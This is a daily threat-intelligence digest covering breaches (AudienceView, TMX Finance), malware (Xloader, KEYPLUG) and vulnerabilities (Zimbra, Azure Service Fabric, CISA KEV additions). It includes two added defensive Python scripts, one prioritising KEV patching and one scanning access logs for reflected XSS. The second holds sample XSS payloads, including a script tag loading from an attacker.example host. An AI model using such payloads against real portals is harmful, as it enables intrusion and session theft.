Daily Threat Intelligence – March 31 – 2023
Email inboxes of NATO, diplomats, and government and military officials are being targeted by an APT group whose operations appear to support Russian and Belarusian geopolitical interests. The group scans for unpatched Zimbra instances to get into victims' mailboxes. In another headline, researchers detailed a high-severity cross-site scripting (XSS) flaw in Microsoft's Azure Service Fabric Explorer. Both Linux and Windows clusters were found vulnerable to the attack, which can lead to a full system takeover.
Speaking of security bugs, researchers flagged unpatched flaws in water pumping systems made by U.S.-based ProPump and Controls. Dozens of the controllers are exposed on the internet, and some of the flaws can be exploited without authentication.
Top Breaches Reported in the Last 24 Hours
Students’ payment data compromised
Students at Cornell University had their credit and debit card information exposed after the university's ticketing software vendor, AudienceView, suffered a network intrusion. The incident also affected other colleges and universities, including SUNY Oswego, Ithaca College, Colorado State University, Virginia Tech, Loyola University Chicago, and McMaster University in Canada. Some students have also lost money as a result of the intrusion.
Breach impacts 4.8 million individuals
TMX Finance and its subsidiaries TitleBucks, TitleMax, and InstaLoan have jointly disclosed a data breach exposing the personal data of 4,822,580 customers. An investigation concluded that the attackers stole customer information between February 3 and 14, 2023. Compromised data includes full name, passport number, driver’s license number, federal/state identification card number, tax identification number, financial account information, and more.
AAD flaw jeopardizes sensitive data
Configuration issues in Microsoft’s Azure Active Directory (AAD) exposed Bing to threat actors who could alter search engine results at will. Wiz researchers discovered the problem and said it could also potentially leak data from Outlook emails, calendars, SharePoint, Teams, and OneDrive files. The issue was fixed in late February.
Top Malware Reported in the Last 24 Hours
Xloader gets an update
The developers of the Xloader information stealer have rolled out a new version with additional obfuscation techniques and other modifications. The new version, first seen in January 2023, keeps the malware's multiple layers of encryption that protect critical code and data from analysis by security vendors. The primary algorithms shared by all versions of the malware are a custom RC4 implementation, a custom buffer decryption routine, and a custom SHA1 hash.
Chinese actors use KEYPLUG backdoor
RedGolf, a Chinese state-sponsored threat group, is using a custom Windows and Linux backdoor known as KEYPLUG, according to Recorded Future’s Insikt Group. Some campaigns by the Winnti group (APT41), whose activity overlaps with RedGolf, have also used KEYPLUG. Google-owned Mandiant first disclosed the use of KEYPLUG by Chinese threat actors in March 2022.
Top Vulnerabilities Reported in the Last 24 Hours
CISA orders agencies to patch spyware zero-days
CISA urged federal agencies to patch, within roughly three weeks, a set of vulnerabilities that includes zero-days recently disclosed by Google's Threat Analysis Group (TAG). Two attack campaigns abused the bugs to install commercial spyware on iOS and Android devices. CVE-2021-30900, CVE-2022-38181, CVE-2023-0266, CVE-2022-3038, and CVE-2022-22706 were added to the CISA Known Exploited Vulnerabilities (KEV) catalog.
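The KEV catalog is published as JSON, and the three-week window is simply the gap between each entry's dateAdded and dueDate. The following script is an added example (not code from the article or from CISA): it reads a KEV-format excerpt, computes the remediation window, and joins the catalog against an internal vulnerability list to show which assets carry KEV-listed CVEs and how many days remain. The field names match the real KEV feed, but the entries, dates, asset names and the findings list are constructed for illustration, and CVE-0000-00000 is a placeholder, not a real CVE.

```python
"""Join a CISA KEV catalog excerpt against an internal vulnerability list.

Added example, not from the original article or from CISA. The JSON uses the
field names of the real KEV feed (cveID, vendorProject, product, dateAdded,
dueDate, requiredAction), but every value below is constructed for this
illustration; pull the live feed from CISA for real work.
"""
import json
from datetime import date

# Constructed excerpt in KEV feed layout (values are illustrative).
KEV_EXCERPT = json.dumps({
    "title": "CISA Catalog of Known Exploited Vulnerabilities (constructed excerpt)",
    "vulnerabilities": [
        {"cveID": "CVE-2021-30900", "vendorProject": "Apple", "product": "iOS",
         "dateAdded": "2023-03-30", "dueDate": "2023-04-20",
         "requiredAction": "Apply updates per vendor instructions."},
        {"cveID": "CVE-2022-38181", "vendorProject": "Arm", "product": "Mali GPU driver",
         "dateAdded": "2023-03-30", "dueDate": "2023-04-20",
         "requiredAction": "Apply updates per vendor instructions."},
        {"cveID": "CVE-2023-0266", "vendorProject": "Linux", "product": "Kernel",
         "dateAdded": "2023-03-30", "dueDate": "2023-04-20",
         "requiredAction": "Apply updates per vendor instructions."},
        {"cveID": "CVE-2022-3038", "vendorProject": "Google", "product": "Chromium",
         "dateAdded": "2023-03-30", "dueDate": "2023-04-20",
         "requiredAction": "Apply updates per vendor instructions."},
        {"cveID": "CVE-2022-22706", "vendorProject": "Arm", "product": "Mali GPU driver",
         "dateAdded": "2023-03-30", "dueDate": "2023-04-20",
         "requiredAction": "Apply updates per vendor instructions."},
    ],
})

# Constructed internal findings: (asset, CVE) pairs from a scanner export.
FINDINGS = [
    {"asset": "kiosk-android-04", "cve": "CVE-2022-38181"},
    {"asset": "kiosk-android-04", "cve": "CVE-2023-0266"},
    {"asset": "build-srv-linux-01", "cve": "CVE-2023-0266"},
    {"asset": "exec-iphone-12", "cve": "CVE-2021-30900"},
    {"asset": "build-srv-linux-01", "cve": "CVE-0000-00000"},  # placeholder, not a real CVE
]


def load_kev(text):
    """Parse KEV JSON into a dict keyed by CVE ID."""
    data = json.loads(text)
    return {v["cveID"]: v for v in data["vulnerabilities"]}


def remediation_window_days(entry):
    """Days CISA gave agencies for this entry (dueDate minus dateAdded)."""
    added = date.fromisoformat(entry["dateAdded"])
    due = date.fromisoformat(entry["dueDate"])
    return (due - added).days


def prioritize(kev, findings, today):
    """Return findings that are in KEV, with due date and days left, most urgent first.

    `today` is an ISO date string so the caller controls the reference date.
    """
    ref = date.fromisoformat(today)
    rows = []
    for f in findings:
        entry = kev.get(f["cve"])
        if entry is None:
            continue  # not in KEV: still a finding, but outside the BOD 22-01 clock
        due = date.fromisoformat(entry["dueDate"])
        days_left = (due - ref).days
        status = "overdue" if days_left < 0 else ("due soon" if days_left <= 7 else "open")
        rows.append({"asset": f["asset"], "cve": f["cve"], "product": entry["product"],
                     "due_date": due.isoformat(), "days_left": days_left, "status": status})
    rows.sort(key=lambda r: (r["days_left"], r["asset"], r["cve"]))
    return rows


def not_in_kev(kev, findings):
    """CVEs from the findings list that the KEV excerpt does not contain."""
    return sorted({f["cve"] for f in findings if f["cve"] not in kev})


if __name__ == "__main__":
    catalog = load_kev(KEV_EXCERPT)
    for row in prioritize(catalog, FINDINGS, today="2023-04-10"):
        print(f'{row["status"]:8} {row["days_left"]:4}d  {row["asset"]:20} {row["cve"]}  ({row["product"]})')
    print("not in KEV:", not_in_kev(catalog, FINDINGS))
```

Because the KEV due date applies per CVE rather than per asset, the join above is what turns a catalog update into a work list: every asset carrying a listed CVE inherits the same deadline, and anything that drifts past it shows up as overdue on the next run.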
APT hunts for Zimbra bug
The Winter Vivern APT group was seen abusing a bug in Zimbra Collaboration to steal secrets from the email inboxes of government agencies in European countries. The group runs vulnerability scanners such as Acunetix to find unpatched webmail portals belonging to potential victims. The reflected XSS bug, CVE-2022-27926, affects Zimbra Collaboration version 9.0.0.
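Because a reflected XSS payload has to travel through the victim's request, the delivery attempt and the preceding scanner probes both land in the webmail server's access log. The script below is an added example (not code from the article, from Proofpoint, or from Zimbra) of a first-pass detection: it parses combined-format access-log lines, percent-decodes each query parameter repeatedly to catch double encoding, and flags script-injection markers. The log lines, IP addresses and the /webmail/ paths are constructed for illustration, and the patterns are generic XSS indicators rather than a signature for CVE-2022-27926.

```python
"""Flag web-server requests whose query string carries an XSS-style payload.

Added example, not from the original article or from Zimbra/Proofpoint. It
parses constructed combined-format access-log lines and percent-decodes each
query parameter (repeatedly, to catch double encoding) before matching a small
set of script-injection patterns. Paths and log lines are made up; the patterns
are generic, not a signature for any specific CVE.
"""
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Apache/nginx "combined" log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Markers that have no business inside a webmail query parameter.
XSS_PATTERNS = [
    re.compile(r"<\s*script", re.I),
    re.compile(r"javascript\s*:", re.I),
    re.compile(r"\bon(error|load|click|mouseover|focus|toggle)\s*=", re.I),
    re.compile(r"<\s*(img|svg|iframe|object)\b", re.I),
]

# Constructed sample: one benign login, one single-encoded payload,
# one double-encoded payload, one benign search.
SAMPLE_LOG = [
    '198.51.100.20 - - [28/Mar/2023:09:14:02 +0000] "GET /webmail/?loginOp=login HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [28/Mar/2023:09:14:09 +0000] "GET /webmail/public/preview?loc=%3Cscript%20src%3D%22https://attacker.example/a.js%22%3E%3C/script%3E HTTP/1.1" 200 1834 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [28/Mar/2023:09:14:11 +0000] "GET /webmail/public/preview?loc=%253Cimg%2520src%253Dx%2520onerror%253Dalert(1)%253E HTTP/1.1" 200 1834 "-" "Mozilla/5.0"',
    '198.51.100.21 - - [28/Mar/2023:09:15:40 +0000] "GET /webmail/search?q=conference%20on%20security HTTP/1.1" 200 2210 "-" "Mozilla/5.0"',
]


def fully_decode(value, max_rounds=3):
    """Percent-decode until the value stops changing (bounded to avoid loops)."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def parse_line(line):
    """Return the log fields as a dict, or None if the line is not combined format."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def find_xss_params(url):
    """Return [(param, decoded_value)] for query parameters matching an XSS pattern."""
    query = urlsplit(url).query
    hits = []
    # parse_qsl decodes one layer; fully_decode strips any further layers.
    for name, raw in parse_qsl(query, keep_blank_values=True):
        value = fully_decode(raw)
        if any(p.search(value) for p in XSS_PATTERNS):
            hits.append((name, value))
    return hits


def scan_log(lines):
    """Return one finding per request carrying an XSS-style parameter."""
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        hits = find_xss_params(rec["url"])
        if hits:
            findings.append({"ip": rec["ip"], "ts": rec["ts"],
                             "path": urlsplit(rec["url"]).path,
                             "params": hits, "ua": rec["ua"]})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f'{f["ts"]} {f["ip"]} {f["path"]} {f["params"]}')
```

Decoding before matching is the part that matters: the third sample line would pass a naive substring check for `<script` or `onerror=` because the browser-visible payload only appears after two rounds of percent-decoding. A single source IP hitting the same endpoint with varied payloads in quick succession, as in the sample, is the scanner behaviour worth alerting on, independent of whether the portal is actually vulnerable.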
Severe Azure Service Fabric flaw
Researchers from Orca Security shared details of an XSS flaw, dubbed Super FabriXss, in Microsoft’s Azure Service Fabric Explorer component. Exploiting the bug, CVE-2023-23383, could allow an attacker to execute arbitrary code, gain administrative control of critical systems, and cause other significant damage. Microsoft fixed it in the March 2023 Patch Tuesday update.
Security lapse in water pump system
Multiple vulnerabilities were reported in the Osprey Pump Controller, a water pumping system by ProPump and Controls. They include remote code execution, cross-site request forgery (CSRF), authentication bypass, cross-site scripting (XSS), command injection, backdoor access, file disclosure, and session hijacking issues. CISA also issued an advisory on these flaws last week.